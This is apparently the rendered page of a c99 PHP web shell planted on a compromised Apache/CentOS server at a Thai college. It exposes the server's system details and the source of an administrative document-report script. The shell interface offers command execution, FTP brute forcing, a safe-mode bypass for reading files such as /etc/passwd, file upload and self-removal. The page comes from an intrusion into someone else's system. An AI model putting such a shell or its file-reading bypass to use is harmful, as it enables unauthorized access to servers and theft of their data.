!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/directorBCNU/admin/   drwxr-xr-x
Free 52.32 GB of 127.8 GB (40.94%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     printRepDocPost.php (8.25 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
SearchMaxDocGroup(); ?>
">รายงาน รายงานหนังสือที่แจ้งขึ้นเว็บของวิทยาลัย
รายงานหนังสือที่แจ้งขึ้นเว็บของวิทยาลัยประเภท SearchByKey($AnID); $oAn->GetRecord(); echo $oAn->AnName; ?> OIS...
"> SearchByKey($DLCID); $oDlc->GetRecord(); $oDlp1->SearchByKey($oDlc->DlpID); $oDlp1->GetRecord(); if($oDlp1->DlpPID!="0"){ $DlcPS2=$DLCID; }else{ $DlcPS2=$oDlc2->SearchDlc2($oDlc->DlcSeq,$oDlp1->DlpPID,$oDlc->deptId); } if($GroupID=="110" || $GroupID=="111" || $GroupID=="112" || $GroupID=="115"){ //head $oDlp->SearchByKey($oDlc->DlpID); $oDlp->GetRecord(); $DlcSeq=$oDlc->DlcSeq; $DlcSeq2=$oDlc->DlcSeq+1; $oDlc3->SearchByNextDlcID($DlcSeq,$oDlc->docGroup,$oDlc->deptId); $oDlc3->GetRecord(); $DLCID2=$oDlc3->DlcID; if($oDlp->DlpPID=="0"){ $oDlc4->SearchByNextDlcID($DlcSeq2,$oDlc->docGroup,$oDlc->deptId); $oDlc4->GetRecord(); $DlcPS22=$oDlc4->DlcID; }else{ $DlcPS22=$DLCID2; } if($GroupID=="112"){ $oDoc->SearchByDrsSendDateDocTypeNoDocSubjectDocNoDeptIdfDeleteDlcIDDlcID2DocGroupDsID3DrsSendSeeAll2($start,$end,$DocTypeNoStart,$DocTypeNoEnd,$DocSubject,$DocNo,$deptId,$DLCID2,$MaxDocGroup,$DlcPS22); }else{ $oDoc->SearchByDrsSendDateDocTypeNoDocSubjectDocNoDeptIdfDeleteDlcIDDlcID2DocGroupDsID3DrsSend2($start,$end,$DocTypeNoStart,$DocTypeNoEnd,$DocSubject,$DocNo,$deptId,$DLCID2,$MaxDocGroup,$DlcPS22); } }else{ $oDoc->SearchByDrsSendDateDocTypeNoDocSubjectDocNoDeptIdfDeleteDlcIDDlcID2DocGroupDsID32($start,$end,$DocTypeNoStart,$DocTypeNoEnd,$DocSubject,$DocNo,$deptId,$DLCID,$MaxDocGroup,$DlcPS2); } while($oDoc->GetRecord()){ $nomainps='0'; $oDlc1->SearchByKey($oDoc->DlcIDRS); $oDlc1->GetRecord(); //echo "DlcID=".$oDoc->DlcID." Doc-deptId=".$oDlc1->deptId." deptId=".$deptId."
"; if($oDlc1->deptId==$deptId){ if(($i%2) == 0) echo ""; else echo ""; $oRs->SearchByDrsFromDrsIDDrsMainPs($oDoc->DrsID); if($oRs->GetRecord()==1){ $oPS->SearchByKey($oRs->personId); $oPS->GetRecord(); $showname=GetPrefix($oPS->prefixId).$oPS->fName." ".$oPS->lName; }else{ $showname="
-
"; $nomainps=1; } ?>
ที่ ที่หนังสือ เรื่อง ว/ด/ป ที่
สั่งการ		 ว/ด/ป ที่
กำหนดเสร็จ		 ผู้รับผิดชอบหลัก ว/ด/ป ที่
รับทราบ		 ว/ด/ป ที่
ดำเนินการเสร็จ		 หมายเหตุ
DocTypeNo); ?>   DocNo; ?>  ".$oDoc->DocSubject; ?> DrsSendDate!="0000-00-00 00:00:00"){ list($DocD,$DocT) = split(' ',$oDoc->DrsSendDate); echo abbreDate2($DocD,'/')."
".a2th($DocT);} ?>		 DrsDocDueDate!="0000-00-00"){ echo abbreDate2($oDoc->DrsDocDueDate,'/'); }else{ echo "-"; } ?> DrsDocReceiveDate!="0000-00-00 00:00:00"){ list($DocD2,$DocT2) = split(' ',$oRs->DrsDocReceiveDate); echo abbreDate2($DocD2,'/')."
".a2th($DocT2);}}?>		 DocRefAnsDate!="0000-00-00 00:00:00"){ list($DocD2,$DocT2) = split(' ',$oRs->DocRefAnsDate); echo abbreDate2($DocD2,'/')."
".a2th($DocT2);}} ?>		  

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0057 ]--